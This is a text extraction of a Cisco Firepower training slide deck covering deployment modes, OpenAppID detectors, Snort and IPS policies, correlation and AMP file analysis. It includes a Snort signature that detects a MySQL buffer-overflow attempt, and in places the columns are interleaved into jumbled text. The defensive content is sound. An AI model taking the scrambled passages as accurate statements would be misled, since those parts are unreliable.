"self": "https://10.62.42.172/api/fmc_config/v1/domain/e276abec-e0f2-11e3-8169-
6d9ed49b625f/policy/accesspolicies/005056AE-729E-0ed3-0000-017179869386"

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 259
API Examples
Python scripts are available in
the “Codes” folder!
Demo:
Why Do We Need
Bulk Method?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 266
Demo:
Add 100’s
interfaces to FTD
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 268
Demo:
Managing
Office365
Exclusions
Managing Office365 Exclusions

• Microsoft Office site for exclusions • Version checking and the script can be
(IPs, URLs) -> Parser script -> FMC scheduled
Objects
• Selectable regions: Worldwide,
• Database access: Germany (Europe), USGovDoD, China
• https://endpoints.office.com/endpoints/Germany?
ClientRequestId=d8... • Selectable services: Exchange,
[ SharePoint, Skype
{
"id": 1,
"serviceArea": "Exchange", • More information:
"serviceAreaDisplayName": "Exchange Online",
"urls": [ "outlook.office.de" ], • https://www.youtube.com/watch?v=nY9nW
"ips": [ VrgO4I
"51.4.64.0/23",
"51.5.64.0/23" • https://github.com/chrivand/Firepower_O3
], 65_Feed_Parser
"tcpPorts": "80,443",
"expressRoute": false,
"category": "Optimize", More information: Protecting your Office 365 environment:
"required": true }, leverage the Firepower API, Cisco Cloud Email Security
} and more. - BRKSEC-3433
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 274
For Your
DEVNET, 12 FMC REST API Labs Reference

• https://learninglabs.cisco.com/labs/tags/Coding,Python/page/1

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 275
For Your
DEVNET, Security Express Reference

• https://learninglabs.cisco.com/tracks/devnet-express-security

• https://dcloud2-lon.cisco.com/content/demo/304193

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 276
For Your
Additional REST API Examples Reference

• http://cs.co/ats-apis

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 277
Deployment and
Interface Modes
FTD Deployment and Interface Modes

• 2 Deployment Modes:
• Routed
Device Modes inherited from ASA
• Transparent
• 6 Interface Modes
• Routed Regular Firewall Modes - Interface Modes
inherited from ASA
• Bridged
• Passive
• Passive (ERSPAN) IPS-only Modes - Interface Modes
• Inline Pair inherited from Firepower
• Inline Pair with Tap
• Interface modes can be mixed on a single FTD device
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 279
FTD Deployment Modes

• The FTD appliance can be deployed in

either Routed or Transparent Firewall A Routed/Transparent E
mode
• This is a global setting B F
• Changing between these modes requires
Policies
C G
re-registering with FMC
D H
Interfaces

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 280
Routed Firewall Mode

• Routed Mode is the traditional

mode of the Firewall 10.1.1.0/24 A Routed E 10.1.2.0/24
• Routed Mode Firewall interfaces -
B F
two or more interfaces in separate
L3 domains Policies
C G
• Firewall is the Router and Gateway
for local hosts D H

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 281
Transparent Firewall Mode

• In Transparent Mode FTD acts as a Transparent

Bridge functioning at L2 VLAN 10 A E VLAN 20

• Allows easy introduction of a Firewall into B BVI 1 F

an existing network
C Policies G
• Must configure IP on BVI in Transparent
Mode
D BVI 2 H
• VLAN or VxLAN ID must change during
traversal
• DHCP, Multicast and Dynamic Routing
protocol traffic is blocked by default

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 282
Integrated Routing and Bridging (IRB)

• Allows configuration of Bridges in Routed

Routed Firewall Mode
10.1.3.0/24 A E 10.1.4.0/24

• Regular routed interfaces can co-exist B F

with BVI interfaces and interfaces that Policies
are members of Bridge groups C G
• Available from FTD 6.2 release, on all
platforms except for the virtual FTD and
D BVI DMZ1 BVI DMZ2 H
Firepower 2100 series 10.1.1.0/24 10.1.2.0/24

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 283
Firepower 1010 Ports and Interfaces
FTD 6.5 and ASA 9.13(1) release
10.1.4.0/24
• Physical interfaces can be configured as a Routed
firewall or as a switch port interfaces
Internet A Eth 1/1 Eth 1/5 E

• Physical firewall interface — forward traffic B F

using the configured security policy to
Policies
apply firewall and VPN services C G
• Physical switch port — forward traffic at
Layer 2, using the switching function in D Eth 1/2 – 1/4 Eth 1/6 – 1/8
H
hardware VLAN 10 VLAN 20
BVI DMZ1 BVI DMZ2
• Switch ports on the same VLAN can
communicate with each other using
hardware switching, and traffic is not
subject to the FTD security policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 286
Firepower 1010 Ports and Interfaces

• Access ports accept only untagged traffic, assign them to a single VLAN
• Trunk ports accept untagged and tagged traffic, can belong to more than one VLAN
• By default, Ethernet 1/2 through 1/8 are configured as access switch ports on VLAN
1, Ethernet 1/1 interface is configured as a firewall interface
• Unfiltered port-to-port forwarding with Switched Virtual Interface (SVI)
• No dynamic routing, EtherChannel, or HA/failover monitored interfaces

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 287
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
QoS
L4 Decode Policy
Existing

IP Decode, Reputation and

TCP Proxy Flow Lookup VPN Encrypt
Reassembly SI

Load-Balance to New flow L3/L2

L2 Decode L2-L3 Decode
Snort
Inspection Engines

RX TX
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
IPS-only Interface Modes

• Can be used in both Firewall Modes

• Traffic processed by subset Datapath functions and all Advanced Inspection Engines
processes
• Packet could be impacted by either Datapath or Advanced Inspection Engines in
Inline Mode after policy and security checks
• Packet not impacted in Inline Tap or Passive Modes
• Datapath still tracks flow

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 289
IPS-only Interface modes - Passive Mode

• A Promiscuous Interface receives copies of

traffic from a SPAN port or Tap
Passive A Routed/Transparent E
• Available in Transparent or Routed
deployment mode
B F
• Passive ERSPAN mode requires Routed FTD
Policies
mode (GRE to encapsulate the traffic) C G

D H

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 290
IPS-only Interface modes - Inline Pair Mode

• Physical interfaces
• EtherChannel (Firepower 4100/9300) A Routed/Transparent E
• True pass-through mode for VLANs Policies
B F
• Data Plane tracks connections for
HA/Clustering C G
• Supported in intra-chassis and inter- Inline Pair 1
D H
chassis clustering VLAN 10 VLAN 10

• Link state propagation

• Snort Fail-Open or Fail-Close

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 291
IPS-only Interface modes - Inline Set

• A grouping of two or more Inline Pairs

A Routed/Transparent E
• Inline sets allow asymmetry Policies
B F

C Inline Pair 1 G
Inline Set
Inline Pair 2
D H VLAN 10
VLAN 10

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 292
IPS-only Interface modes - Inline Tap

• Available in Transparent or Routed Mode

A Routed/Transparent E
• Traffic passes from one member interface
to another, without changing VLAN Policies
B F
• As traffic passed, it is copied to the
inspection engine, so traffic cannot be C G
blocked
VLAN 10 D Inline TAP H VLAN 10

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 293
NGIPS Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Act Upon
Verdict
New flow Flow
Lightweight Application
Flow Creation Database Inspection
Flow Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
Lightweight
State Tracking
Main Access
QoS
L4 Decode Policy
Existing

IP Decode, Reputation and

TCP Proxy Flow Lookup VPN Encrypt
Reassembly SI

Load-Balance to New flow L3/L2

L2 Decode L2-L3 Decode
Snort
Inspection Engines

RX TX
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Application
Visibility and
Control (AVC)
Application Visibility and Control

• Support for 4000+ applications and detectors

• Applications are grouped according to:
• Risk
• Business relevance
• Types, categories and tags
• User-Created Filters

• Cisco Firepower Application Detector Reference

• All Application Detectors in Firepower use OpenAppID

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 297
OpenAppID Overview

• OpenAppID leverages Lua scripting language

• Application detectors are written using the Lua (not snort rules)
• Lua is an open-source scripting language
• Designed, implemented and maintained at the Pontifical Catholic University of Rio de
Janeiro in Brazil
• Benefits of Lua
• Proven – used in many industrial applications, including several Cisco products
• Powerful and fast – utilizes LuaJIT just-in-time compiler
• Portable and embeddable – well documented API
• Simple, lightweight and small
• See more at http://www.lua.org

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 298
Access Control Policy
Adding Application Control Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 299
Access Control Policy
Adding Application Control Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 300
Types of Custom Detectors

• Basic
• FMC creates Lua script after administrator describes application in a Wizard
• Limited to specific combinations of port matching, string matching, and protocol
• Advanced
• Administrator creates and uploads custom Lua script
• Unleashes the power of Lua

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 301
For Your
Example of a Lua Script Reference

--[[
detection_name: SampleAppDetector function DetectorInit(detectorInstance)
version: 1 gDetector = detectorInstance;
description: gAppId =
Detects "cisco123" on port 8888 gDetector:open_createApp("SampleApp");
--]] if gDetector.addPortPatternService then
gDetector:addPortPatternService(proto,
require "DetectorCommon" 8888,"cisco123",-1,gAppId);
local DC = DetectorCommon end
local proto = DC.ipproto.tcp; end
DetectorPackageInfo = {
name = "SampleAppDetector", function DetectorValidator()
proto = proto, end
server = {
init = 'DetectorInit', function DetectorClean()
validate = 'DetectorValidator', end
clean = 'DetectorClean',
minimum_matches = 1
}
}

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 302
OpenAppID within Firepower
Creating the Basic Custom Detector

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 303
OpenAppID within Firepower (cont.)
Creating the Basic Custom Detector

Define and Add Application Protocol

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 304
For Your
OpenAppID within Firepower (cont.) Reference

Creating the Basic Custom Detector

Specify name, Description,

Business Relevance and
Risk fields

Specify Category

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 305
For Your
OpenAppID within Firepower (cont.) Reference

Creating the Basic Custom Detector

Now specify name, Description and

Application Protocol fields and Click OK

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 306
For Your
OpenAppID within Firepower (cont.) Reference

Creating the Detection Patterns

Adding Detection Patterns

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 307
For Your
OpenAppID within Firepower (cont.) Reference

Creating the Detection Patterns

Different protocols available

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 308
OpenAppID within Firepower (cont.)
Creating the Basic Custom Detector

Basic Detectors perform an OR

operation on the Detection Patterns

Optional test with pcap files

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 310
OpenAppID within Firepower (cont.)
Creating the Custom Detector

You can find your Application Detector The new Application Detector will not function
by selecting Custom Type in the Filters until it is Activated by clicking on the State slider

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 311
OpenAppID within Firepower (cont.)
Creating the Custom Detector

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 312
OpenAppID within Firepower
Adding Rule in the Access Control Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 313
OpenAppID within Firepower
Access Control Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 314
Preprocessors

• Preprocessors play a vital function in network traffic inspection

• Present packets to the detection engine in a contextually relevant way
• Normalize traffic
• Alert if they detect anomalous conditions as defined by their settings

• Major preprocessors include the following

• frag3 – Used to reassemble packet fragments prior to inspection
• stream5 – Used to reconstruct TCP data streams so that inspection can be done in the context
of a TCP conversation
• Protocol decoders – Normalize TCP streams: telnet, FTP, SMTP and RPC
• http_inspect – Normalizes http traffic
• sfPortscan – Used to detect portscans

• The Network Analysis Policy (NAP) controls the Preprocessors

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 315
Network Analysis Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 316
System Provided Network Analysis Policy

• Connectivity over Security

• 15 preprocessors enabled
• Balanced Security and Connectivity
• 15 preprocessors enabled
• Security over Connectivity
• 17 preprocessors enabled
• Maximum Detection
• 18 preprocessors enabled

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 317
Network Analysis Policy

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 319
Network Analysis Policy (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 320
Network Analysis Policy (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 321
Network Analysis Policy (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 322
Network Analysis Policy (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 323
Network Analysis Policy (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 324
Next Generation
Intrusion Prevention
System (IPS)
Next Generation IPS Policy Overview

• An IPS Policy determines:

• Which IPS rules are “on” (Generate or Drop and Generate) and which are “off” (Disabled)
• Many aspects about how the IPS will inspect traffic

• Multiple IPS policies can be deployed on a Firewall

• IPS policies can be optimized for different traffic flows through the device
• Access Control Policy controls which flow will be inspected by which IPS policy
(with Allow and Interactive Block rule actions)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 326
System Provided Base IPS Policies

• Connectivity over Security: ~ 500 Rules

• CVSS Score of 10
• Age of Vulnerability: Current year and 2
prior years

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 327
System Provided Base IPS Policies

• Balanced Security and Connectivity:

~11.000 Rules
• CVSS Score of 9 or greater
• Age of Vulnerability: Current year and 2
prior years
• Rule category equals Malware-CnC,
blacklist, SQL Injection, Exploit-kit

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 328
System Provided Base IPS Policies

• Security over Connectivity: ~ 17.000 Rules

• CVSS Score of 8 or greater
• Age of Vulnerability: Current year and 3
prior years
• Rule category equals Malware-CnC,
blacklist, SQL Injection, Exploit-kit, App-
detect

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 329
System Provided Base IPS Policies

• Maximum Detection: ~ 31.000 Rules

• CVSS Score of 7.5 or greater
• Age of Vulnerability: 2005 and later
• Rule category equals Malware-CnC,
Exploit-kit
• Not for use in deployment – used only
for benchmark testing

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 330
System Provided Base IPS Policies

• No Rules Active
• Often used if planning to use Firepower
Recommendations to turn rules on based
on your environment
• Problem - no longer have the advantage
of Talos’ input for the new rules
• The best practice is to start with Security
Over Connectivity (or Balanced) and use
the recommendations to adjust these in a
layer

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 331
Snort Rule Updates

• Cisco TALOS provides regular rule updates, and these are typically automatically
updated
• The rules provided in a Snort Rule Update (SRU) package are created and tested by
the Cisco Talos Security Intelligence and Research Group

Uncheck to
prevent/control automatic
rule installation

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 332
For Your
Intrusion Policy Rules Reference
How to search for rules included in SRU updates?

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 333
For Your
Intrusion Policy Rules (cont.) Reference
Different rule categories

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 334
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 335
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules: Platform specific

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 336
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules: Microsoft vulnerabilities

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 337
Importing Snort Rules

• The Import file can contain many rules as long as they are one rule per-line

• Navigate to Objects > Intrusion Rules

• Click on “Import Rules”

Import Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 338
Importing Snort Rules

• Click on “Browse” to locate your file, and click “Import”

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 339
Importing Snort Rules

• If successful, you will see a screen showing what has been imported

• If unsuccessful, the Rule Update Log will tell you what was wrong with the file

SID >1.000.000

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 340
Enabling Snort Rules

• All imported rules are disabled by default, you need to enable them

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 341
Snort Language
Overview

• A simple lightweight language for identifying

• Security policy violations
• Known network attacks and IDS/IPS evasion techniques

• The basic unit of the Snort language is the Snort rule

• Snort language supports event filters
• Limit – Alert on a specified number of events during a specified time interval, then ignore
events for the rest of the specified time interval
• Threshold – Only alert if the event is seen a specified number of times within a specified time
interval

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 342
Snort Language
Sample rule

Variables

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 Rule header

(msg:"SERVER-MYSQL Database COM_FIELD_LIST Alert text
Buffer Overflow attempt";
flow:to_server,established; Flow attribute

content:"|04|"; depth:1; offset:4; Content search

metadata:policy security-ips drop, Rule body
service mysql; reference:cve,2010-1850; Metadata
classtype:attempted-user;
sid:16703; rev:10; ) Signature ID and revision number

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 343
Variable Sets

• Variables are critical component of IPS

rules
• Used to identify source and destination IP
addresses and ports
• Variable sets manage, customize, and
group your variables
• Default variable set is provided; custom
variables and variable sets can be
created

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 344
Multiple definitions for Variable Set

• The best practice is to be as specific as

possible
• Definition of $EXTERNAL_NET as
!$HOME_NET
• Significant performance gain
• Never use it in internally-based policies

• Each network could be identified with a

unique variable values

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 345
Variable Sets and Intrusion Policies

• Associated to intrusion policies in Access Control Policy rules or with the default
action of an access control policy
• For protecting a different networks use custom IPS policy for each network

Choose the variable set here

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 346
Network Discovery Policy

• The Network Discovery Policy is used to identify for which networks Firepower
should perform passive discovery and build Host Profiles

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 347
Host Profile
• XML file associated with a particular IP address

• Complete view of all the information available for

hosts (OS, services, applications,
potential vulnerabilities and different host
attributes)
• Firepower system can also build Host Profile
manually or through host input API

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 348
Network Discovery Policy
Advanced Settings

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 349
Network Discovery Policy
Advanced Settings

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 350
Firepower Recommended rules

• Firepower Recommendations makes sure your system has the right detections
enabled which are relevant to your specific network
• Automatically tunes your Snort rules for the applications, servers, and hosts on your
network

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 351
Firepower Recommended Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 352
Firepower Recommended Rules (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 353
For Your
Firepower Recommended Rules (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 354
For Your
Firepower Recommended Rules (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 355
Firepower Recommended Rules (cont.)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 356
Firepower Recommended Rules (cont.)

For different areas of

your network, you
can use different IPS
Recommendations

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 357
Impact Assessment
How Relevant is the Attack ?

• Prevents information overload

IMPACT FLAG INTRUSION EVENT ADMINISTRATOR ACTION WHY

Neither the Source or Destination IP address is within the range General info* Event outside Event occurred outside profiled
0
of your IP addresses profiled networks networks

IP address of a host in within the defined IP range of your Good to Know, Unknown Monitored network, but unknown
4
network, but no current host profile for the device Target host

IP address of a host in within the defined IP range of your Good to Know, Currently Relevant port not open or protocol
3
network, but no connection was made Not Vulnerable not in use

IP address of a host in within the defined IP range of your Investigate, Potentially Relevant port open or protocol in
2
network, and connection was made to a working service Vulnerable use, but no vulnerability mapped

Act Immediately, Host Event corresponds to vulnerability

1 Event that is launched from a compromised host
vulnerable or Compromised mapped to host

* If you have a fully profiled network

this may be a critical event!

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 358
IPS Policy Architecture

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 359
IPS Policy Architecture

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 360
IPS Policy in Access Control Policy

• Traffic must match in the Access Control Policy in order to be Inspected

IPS Policy for individual rule

IPS Policy as default action

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 361
Operational
Insights
Correlation Policy

• Respond in real time to threats and network traffic deviates from its normal profile

• Consists of two primary components - correlation rules and responses

• Correlation rules define what specifically you want to be alerted on:

• Connection, intrusion, malware, discovery, user activity events
• Network traffic deviates from its normal profile

• Responses to correlation policy violations can be simple alerts or various

remediations modules or both

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 363
Correlating Event Data
Flow and connection Data from User Table Data from Host Profiles
conditions over time or (name, group info, etc)
volume

When a… Add Connection Tracker Add User Qualification Add Host Profile Qualification
Intrusion Event ✔ ✔ ✔

Discovery Event ✔ ✔ ✔

Connection Event ✔ ✔ ✔

Host Input Event ✔ ✔ ✔

User Activity Occurs ✔ N/A ✔

Traffic Profile Changes

N/A N/A N/A

Malware Event N/A N/A N/A

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 364
For Your
Correlation Rule configuration Reference

Overview

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 365
Correlation Policy Responses

• Correlation Policy lets you respond automatically when a violation or suspicious

activity is detected
• Responses include:
• Simple alerts - email, SNMP and syslog
• Remediations modules
• A combination of remediations modules and simple alerts

Correlation Policy
Correlation Correlation Email
Rule Event
Syslog
Correlation
Rule
Action SNMP
Remediation Module

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 366
Remediation modules
Overview

• Program that the Firepower System launches in response to a correlation policy

violation
• The system supports several remediation modules:
• pxGrid mitigation
• Cisco IOS Null Route
• Nmap Remediation
• Set Attribute Value

You can upload custom

remediation modules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 367
Implementing Remediations

• Create at least one instance for the module you choose

• You can create multiple instances per module, where each instance is configured
differently

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 368
For Your
Implementing Remediations (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 369
For Your
Implementing Remediations (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 370
For Your
Implementing Remediations (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 371
For Your
Correlation Policy Example Reference
Production Network Change

• New IP addresses appear on the network

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 372
For Your
Correlation Policy Example (cont.) Reference
Production Network Change

Create Policy

Add Rules

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 373
For Your
Correlation Policy Example (cont.) Reference
Production Network Change

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 374
For Your
Correlation Policy Example (cont.) Reference

Responses

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 375
For Your
Correlation Policy Example (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 376
For Your
Correlation Policy Example (cont.) Reference

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 377
Are You Hungry?

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 396
Lunch – 1 Hour 45 Minutes
AMP for Networks
AMP for Networks - Basics

• Can detect, track, store, analyze, and optionally block the transmission of malware
and all files of a specific type (regardless of whether the files contain malware) in
network traffic
• Created File policies and associated with access control rules handle network traffic
that matches the rules
• Files detected in traffic can be captured and run local dynamic analysis and/or
submit files to the AMP Threat Grid cloud or appliance to determine whether the files
represent malware

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 399
AMP for Networks - Inspection Path
Datapath - RX
incoming packet
AMP in the network
Rule 1: Monitor
inspection Path
matching traffic cont.

Rule 2: Trust no inspection

no match
Datapath -
Rule 3: Block no inspection TX
no match

files & Intrusion Policy

Network File/AMP intrusions
Rule 4: Allow malware
Analysis Policy Processing blocked Network Discovery blocked

no match

Default Action: Network Intrusion Policy intrusions

Intrusion Prevention Analysis Policy Network Discovery blocked

Inspection Engines
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
File/AMP Processing
Actions on a File Rule

Rule Actions
File Type Control Malware Analysis
on a File Policy

Malware Block
Detect Files Block Files
Cloud Lookup Malware

Spero Analysis for

MSEXE

Local Malware
Files Analysis
Files can be stored, regardless
of Malware Disposition Dynamic Analysis

Malware Unknown Clean Custom

Files can be stored, based on
© 2020Malware Disposition
Cisco and/or its affiliates. All rights reserved. Cisco Public
For Your
Order of Processing Malware Analysis -1 Reference

Managed devices monitor network traffic for transmissions of certain file type

Y public / private
File size > limit? Stop file capture
AMP Cloud
N

N
Entire File Seen?
Y
FMC
Calc SHA256 Analysis Engine Cache lookup

Action Y Drop last packet SHA256 lookup Sensor

Malware Cloud Lookup
or Block Malware Force Retransmit Local cache Analysis Engine Cache lookup

Y Malware Event
File is Malware?
and Block
N
N Y No further
File was captured? File is Clean? end
processing
Y

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 402
For Your
Order of Processing Malware Analysis – 2 Reference

Y
Inspect archive? Extract contents Uninspectable archive
N
Y
Store files? Capture file
N
Y Y public / private
Spero? Spero Supported File Compute spero hash
AMP Cloud
N
ClamAV
Y Y
Local Malware Analysis? Office, pdf, exe? Pre-class + High
Fidelity Scan
N
Y ClamAV Y public / private
Dynamic Analysis? File Submission
Pre-class Flagged Threat Grid
N
File Event Capacity Handling()

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 403
Local Malware Analysis

CL_TYPE_EXE, EXE_PACKED,
public / private
CL_TYPE_UNKNOWN, EXE_PARSER_FAILURE, Threat Grid
CONTAINS_EMBEDDED_EXE, JSON_INACTIVE,

CONTAINS_EMBEDDED_HTML, OLE_MACRO,

CONTAINS_EMBEDDED_MACROS, OLE_PARSE_ERROR, File Submission

CONTAINS_FLASH_OBJECT, OLE_VBA,

CONTAINS_NUMEROUS_OBJECTS, PDF_ACRO_FORM, Suspect File

EXE_ABNORMAL_ENTRYPOINT, PDF_JAVASCRIPT,

EXE_NUMEROUS_SECTIONS, PDF_NO_EOF, PDF_OPEN_ACTION Normal File

No further
processing
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 408
Local Malware Analysis Files on Disk (CLI)

• Required signature data files, which Clam analysis engine uses for pre-classification
and for static analysis
> expert
admin@gate2:~$ sudo su
Password:
root@gate2:/var/sf/clamupd_download# ls -l *.cvd
-rw-r--r-- 1 root root 4643591 Jan 16 16:35 hifistatic.cvd
-rw-r--r-- 1 root root 45011 Dec 5 15:58 preclass.cvd
• NOTE: If “Enable Automatic Local Malware Detection Updates” is enabled, Firepower
Management Center checks for signature updates once every 30 minutes

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 409
Dynamic Analysis aka Threat Grid
